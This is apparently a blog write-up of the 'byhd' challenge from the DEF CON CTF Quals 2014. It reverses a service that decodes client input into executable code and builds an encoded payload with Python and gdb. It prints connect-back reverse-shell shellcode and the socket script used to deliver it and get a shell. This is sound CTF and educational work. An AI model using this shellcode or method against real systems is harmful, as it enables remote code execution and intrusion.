Defcon ctf quals 2014 – byhd zepvn

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Defcon CTF Quals 2014 – byhd | zepvn


Search MAY 18, 2014

Defcon CTF Quals 2014 – byhd By admin

Challenge description:

Who hath lived like hacker’s life and refused the normalness must be rewarded with straw, sticks and bricks. On this challenge we need to connect to a service at . The binary file is given here The main handler function is at 0x401a15 which could be described by this pseudo code:

sub_401a15(): Read content of running binary file, store to (char*) binary_buffer Read 4 bytes from client, store to (int) N if N < 256: Read N bytes from client, store to (char*) input_buffer Call function at 0x40173b: (char*) new_buffer_1 = sub_40173b(binary_buffer, sizeof(binary_buffer)) Call function at 0x401f6b: (char*) new_buffer_2 = sub_401f6b(new_buffer_1) Call function at 0x402233: sub_402233(new_buffer_2) Call function at 0x40185a: (char*) transformed_input_buffer = sub_40185a(new_buffer_2, input_buffer)t (void*) mem = mmap(0, sizeof(transformed_input_buffer), READ|WRITE|EXEC, 0x22, -1, 0) memcpy(mem, transformed_input_buffer, sizeof(transformed_input_buffer)) (mem)() munmap(mem, sizeof(transformed_input_buffer))

Basically the service allows client to send up to 255 bytes as raw input, then transforms it by the function at 0x40185a before executing it. So what we could do is to send a input_buffer that makes transformed_input_buffer a valid shellcode. We don't need to understand what it does in sub_40173b , sub_401f6b , and sub_402233 as their inputs are all derrived from the content of the running binary (which is static), that means the output is static regardless of our input. We will try to grab it later on. We use Hopper to decompile the function at 0x40185a that receives our original input and transform it. Hopper doesn't do well with looping so we have to touch up the code a bit, the final code looks like:

function sub_40185a(char* new_buffer_2, char* input_buffer, int size) { char* output_buffer = null; char next_byte = 0x0; int index = 0x0; var_44 = 0x0; var_56 = 0x0; if ((new_buffer_2 != 0x0) && (input_buffer != 0x0) && (size != 0)) { var_44 = size * 4; output_buffer = _malloc(var_44); if (output_buffer != 0x0) { // loc_4018f5; memset(output_buffer, 0x0, var_44) != -1) // loc_4018f6; while (next_byte != -1) { next_byte = (byte) sub_40127c(new_buffer_2, input_buffer); if (next_byte != -1) { output_buffer[index] = var_36; index += 1;


Defcon CTF Quals 2014 – byhd | zepvn


if (LODWORD(index) >= var_44) { var_44 = var_44 << 0x1; char* temp_buffer = (char*) _malloc(var_44); _memset(temp_buffer, 0x0, var_44); _memcpy(temp_buffer, output_buffer, LODWORD(LODWORD(var_44) >> 0x1)); _memset(output_buffer, 0x0, LODWORD(LODWORD(var_44) >> 0x1)); _free(output_buffer); output_buffer = temp_buffer; } } } } } return output_buffer; }

We see that it keeps getting new bytes by calling sub_40127c and append them to output_buffer until that function returns 0xffffffff . We continue reversing sub_40127c :

int sub_40127c(char* new_buffer_2, char* input_buffer) { int final_byte = 0xffffffff; current_address = new_buffer_2; if ((new_buffer != 0x0) && (input_buffer != 0x0)) { int counter = *(int32_t *)(&input_buffer[8]); int limit = *(int32_t *)(&input_buffer[12]); while ((*current_address != 0x0) && (counter < limit)) { int byte_index = counter / 8; int bit_index = counter % 8; if (input_buffer[byte_index] >> (7-bit_index)) == 1 { current_address = *(current_address + 0x8); } else { current_address = *current_address; } counter ++; } input_buffer[8] = counter; if (*current_address == 0x0) { final_byte = *(int8_t *)(current_address + 0x10); } } return final_byte; }

So it looks that the function initializes the pointer current_address pointing to new_buffer_2 then loops through every bit of input_buffer and change the current_address to either *current_address or *(current_address + 0x8) depends on whether the current bit of input_buffer is 0 or 1 respectively. The process stops when value of current_address is 0 and function returns *(current_address + 0x10)

For instance, if the bit stream of input_buffer is 100111011.. , the current_address would jump as: 1 0 0 1 current_address -> *(current_address) -> *(current_address) -> *(current_address + 8 ) -> ... -> final_address // it stops somewhere when *(final_address) == 0

So we could start from the address of new_buffer_2 , then recursively jump to *(new_buffer_2 + 8) and *new_buffer_2 and so on to get all the cases that might happen in that function (ie. get all the outputs and their corresponding bit streams) Since the output also depends on new_buffer_2 , we need to grab its content. Taking a closer look at the assembly code where sub_40127c is called: 0x0000000000401912: mov -0x38(%rbp),%rax 0x0000000000401916: mov %rdx,%rsi 0x0000000000401919: mov %rax,%rdi 0x000000000040191c: callq 0x40127c 0x0000000000401921: mov %eax,-0x2c(%rbp) 0x0000000000401924: cmpl $0xffffffff,-0x2c(%rbp) 0x0000000000401928: je 0x401a02


Defcon CTF Quals 2014 – byhd | zepvn


We set the breakpoint at 0x40191c (right before sub_40127c is called): # gdb ./byhd_147e0accdae13428910e909704b21b11 (gdb) set scheduler-locking step (gdb) br *0x40191c (gdb) r

Then write a simple Python code to generate some random payload:

import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('', 9730)) # This is the local IP address of our box s.send("\xff\x00\x00\x00") s.send("A"*255)

gdb now stops at our breakpoint and we start dumping the memory. We simply grab everything readable in the memory just to be safe, in this case we read from 0x603000 to 0x625fff (gdb) x/143360 0x603000 0x603000: 0x08070c1b 0x10070190 0x00000014 0x0000001c 0x603010: 0xffffe180 0x0000002a 0x00000000 0x00000000 0x603020: 0x00000014 0x00000000 0x00527a01 0x01107801 0x603030: 0x08070c1b 0x00000190 0x00000024 0x0000001c .....

Also get the address of new_buffer_2 : (gdb) info registers rdi rdi 0x603000 6303744

So we got the content of memory and the starting point now, this Python code helps to generate the case tree:

import sys s = """0x603000: 0x08070c1b 0x10070190 0x00000014 0x0000001c 0x603010: 0xffffe180 0x0000002a 0x00000000 0x00000000 0x603020: 0x00000014 0x00000000 0x00527a01 0x01107801 0x603030: 0x08070c1b 0x00000190 0x00000024 0x0000001c 0x603040: 0xffffde60 0x000002f0 0x46100e00 0x0f4a180e ... (snip .. snip .. too long to paste here) .... 0x625fd0: 0x00000000 0x00000000 0x00000000 0x00000000 0x625fe0: 0x00000000 0x00000000 0x00000000 0x00000000 0x625ff0: 0x00000000 0x00000000 0x00000000 0x00000000""" memory = {} for line in s.split("\n"): for value in line.split()[1:]: memory[start] = value start += 4 rdi = 0x60e1e0 queue = [rdi] values = set() while len(queue) > 0: item = queue.pop(0) mem = memory[item] if eval(mem) ==0: values.add(memory[item+16]) v = chr(int(memory[item+16][8:], 16)) if v not in before: before[v] = item if eval(mem) !=0 and mem not in values: queue.append(eval(mem)) if eval(mem) not in before: before[eval(mem)] = item mem = memory[item+8] if eval(mem) !=0 and mem not in values: queue.append(eval(mem)) if eval(mem) not in before: before[eval(mem)] = item


Defcon CTF Quals 2014 – byhd | zepvn


A bit explanation on that Python code, after everything is done: If we have before[an_address] == another_address , that says in order to reach another_address the function needs to jump to an_address first. We also have before[a_character] == address that indicates the function needs to jump to address to return a_character . With that data we could trace back the bit stream for any character by starting from before[character] . For example with character 'H', we got the steps: 0x60e1e0 -> address = *(address + 8) -> 1 0x60e1b0 -> address = *(address + 8) -> 1 0x60e180 -> address = *(address) -> 0 0x60e0f0 -> address = *(address + 8) -> 1 0x60e000 -> address = *(address) -> 0 0x608fc0 -> 'H'

So we need 5 bits '11010' from raw_input to get 'H' in final output. We extend that Python code a bit to build the input from the shellcode, in this case we use a connect-back shellcode (Thanks @manhluat93 for this awesome shellcode).

.... shellcode = 'H1\xd2H1\xc0\xb2\x02H\x89\xd7\xb2\x01H\x89\xd6\xb2\x06\xb0)\x0f\x05H\x89\xc7H1\xc0P\xbb\xd2\xd3}UH\xc1\xe3 f\xb8\x11\\\xc1\xe0\x10\xb0\x02H\t\ bitstream = "" for item in shellcode: next_stream = "" while before[item] != None: if before[item] != None: if eval(memory[before[item]]) == item: next_stream = "0" + next_inp elif eval(memory[before[item]+8]) == item: next_stream = "1" + next_inp else: pass item = before[item] bitstream = bitstream + next_inp # The result would be: bitstream = '1010101010010100101....' raw_inp = "" for i in range(len(inp)/8): s = bitstream[i*8:i*8+8] raw_inp += chr(int(s,2)) print repr(raw_inp)

And we got the output:

'\xd7_\xe0\x9a\xeb\xec\xea\x0bv\xbd\x90\n\x82\x9f^\xccu\x05\xf3\xfa=\x0f\x0f\xd7\xafsk\xaf\xb3\xae\xd3\x9e\t@\xb915\xbep[\xb9m\xee\x0e\xf0\xef\x9b| Gv\xae\x1b ^\xba\xfb\xe1\xae\xbf\xc1&\xf5\x83\xe0\\x0bi\xcf\xf2\xf0*:\xba\xe25\xedF\xd7_g\xf4x\x0f\x0f\xd7\xb5'

Try to send this to the real service:

import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('', 9730)) s.send("\xff\x00\x00\x00") s.send('\xd7_\xe0\x9a\xeb\xec\xea\x0bv\xbd\x90\n\x82\x9f^\xccu\x05\xf3\xfa=\x0f\x0f\xd7\xafsk\xaf\xb3\xae\xd3\x9e\t@\xb915\xbep[\xb9m\xee\x0e\xf0\xef\x9b|_

Since it's a connect-back shell, we got a shell from our server and simply read the flag cat flag The flag is: What a cold ass gershnoskel.


Defcon CTF Quals 2014 – byhd | zepvn


Some facts The binary requires user byhd to exist in the system so we need to create a new system user before running the binary on our box. I had to run it as root otherwise some of the initialization functions would fail. It was hard to debug the resulting shellcode as we have to set the break point and examine the memory from time to time. So I had an idea to change the binary so that it could send back the final output to client. It's obviously not possible to patch the binary as its content is one of the factor to generate the final shellcode. I came up with the following gdb commands to patch the instructions at runtime: # gdb ./byhd_147e0accdae13428910e909704b21b11 (gdb) br *0x4011ad # Make it stop at entry point (gdb) r Starting program: /tmp/byhd_147e0accdae13428910e909704b21b11 [Thread debugging using libthread_db enabled] Breakpoint 1, 0x00000000004011ad in ?? () (gdb) set *(unsigned char*)0x401c56=0x74 (gdb) set *(unsigned char*)0x401c6c=0xff (gdb) set *(unsigned char*)0x401c64=0x48 (gdb) set *(unsigned char*)0x401c65=0x8b (gdb) set *(unsigned char*)0x401c66=0x4d (gdb) set *(unsigned char*)0x401c67=0xe8 (gdb) c

What it does is to change the following assembly code: 0x0000000000401c52: cmpl $0x0,-0x28(%rbp) # This is to check if mmap was called succesfully or not. 0x0000000000401c56: jne 0x401c86 # Jump if success 0x0000000000401c58: mov -0x18(%rbp),%rax 0x0000000000401c5c: mov %rax,%rdi 0x0000000000401c5f: callq 0x400eb0 <free@plt> 0x0000000000401c64: lea -0x4c(%rbp),%rcx # Assign the address of some buffer to be sent back 0x0000000000401c68: mov -0x54(%rbp),%eax 0x0000000000401c6b: mov $0xff,%edx 0x0000000000401c70: mov %rcx,%rsi 0x0000000000401c73: mov %eax,%edi 0x0000000000401c75: callq 0x400ef0 <write@plt> # Write buffer to socket

To: 0x0000000000401c52: cmpl $0x0,-0x28(%rbp) 0x0000000000401c56: je 0x401c86 # Don't jump if success 0x0000000000401c58: mov -0x18(%rbp),%rax 0x0000000000401c5c: mov %rax,%rdi 0x0000000000401c5f: callq 0x400eb0 <free@plt> 0x0000000000401c64: mov -0x18(%rbp),%rcx # I assign the address of final shellcode here 0x0000000000401c68: mov -0x54(%rbp),%eax 0x0000000000401c6b: mov $0xff,%edx 0x0000000000401c70: mov %rcx,%rsi 0x0000000000401c73: mov %eax,%edi 0x0000000000401c75: callq 0x400ef0 <write@plt>

After that's done we always get back our final shellcode every time we send a raw input which is really convenient for debugging. Post a Comment or leave a trackback: Trackback URL.

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Defcon CTF Quals 2014 – byhd | zepvn


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